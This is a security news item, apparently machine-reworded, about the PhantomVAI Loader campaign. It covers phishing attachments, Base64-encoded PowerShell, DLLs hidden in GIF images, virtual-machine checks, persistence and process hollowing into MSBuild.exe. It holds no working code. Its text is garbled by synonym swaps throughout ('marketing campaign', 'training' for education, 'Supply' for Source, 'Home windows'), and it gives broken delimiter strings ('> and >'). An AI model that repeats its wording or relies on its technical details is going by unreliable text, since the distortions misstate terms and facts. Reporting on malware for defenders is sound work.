A complicated multi-stage malware marketing campaign is concentrating on organizations globally, using the PhantomVAI Loader to distribute harmful information-stealing malware.
The assault chain, which begins with fastidiously crafted phishing emails, has emerged as a major risk to companies throughout manufacturing, training, healthcare, expertise, utilities, and authorities sectors.
This malware household, beforehand referred to as Katz Stealer Loader, has developed to ship a number of infostealer variants together with AsyncRAT, XWorm, FormBook, and DCRat, making it a flexible software within the cybercriminal arsenal.
The an infection begins when unsuspecting customers obtain phishing emails containing malicious attachments disguised as respectable enterprise communications.
These emails make use of social engineering themes reminiscent of gross sales inquiries, fee notifications, and authorized issues to lure victims into opening archived JavaScript or VBS information.
What makes these assaults notably insidious is using homograph assaults, the place risk actors change Latin characters with visually related Unicode characters, successfully bypassing electronic mail safety filters.
PhantomVAI Loader assault chain (Supply – Palo Alto Networks)
After the preliminary phishing stage, Palo Alto Networks analysts recognized that the assault progresses via a number of refined layers.
The malicious scripts are closely obfuscated and comprise Base64-encoded PowerShell instructions that execute mechanically upon opening.
These PowerShell scripts obtain what seems to be an innocuous GIF or picture file from attacker-controlled servers.
The beginning of encoded Base64 textual content embedded in a GIF file (Supply – Palo Alto Networks)
Nonetheless, these picture information conceal the loader payload utilizing steganography methods, the place Base64-encoded DLL information are embedded throughout the picture information between particular delimiter strings reminiscent of > and >.
An infection Mechanism and Evasion Strategies
As soon as the encoded textual content is extracted, the PowerShell script decodes it and hundreds the PhantomVAI Loader DLL written in C#. The loader executes a technique referred to as VAI, which performs a number of essential features earlier than deploying the ultimate payload.
It conducts complete digital machine detection checks utilizing code based mostly on the VMDetector GitHub challenge.
The malware examines system attributes together with pc data, BIOS particulars, laborious disk traits, and Home windows providers to find out if it runs in a virtualized atmosphere.
If any examine returns optimistic, PhantomVAI Loader instantly terminates.
The loader establishes persistence via scheduled duties that execute PowerShell instructions to obtain and run information from attacker-controlled URLs, or by creating Home windows Registry Run keys.
An infection chain that begins with the person opening an electronic mail utilizing msedge.exe (Supply – Palo Alto Networks)
Lastly, it downloads the ultimate payload from a command-and-control server and injects it into respectable system processes utilizing course of hollowing, mostly concentrating on MSBuild.exe within the .NET Framework listing.
This evasion mechanism permits the malware to function undetected whereas delivering information-stealing capabilities.
Comply with us on Google Information, LinkedIn, and X to Get Extra Prompt Updates, Set CSN as a Most well-liked Supply in Google.
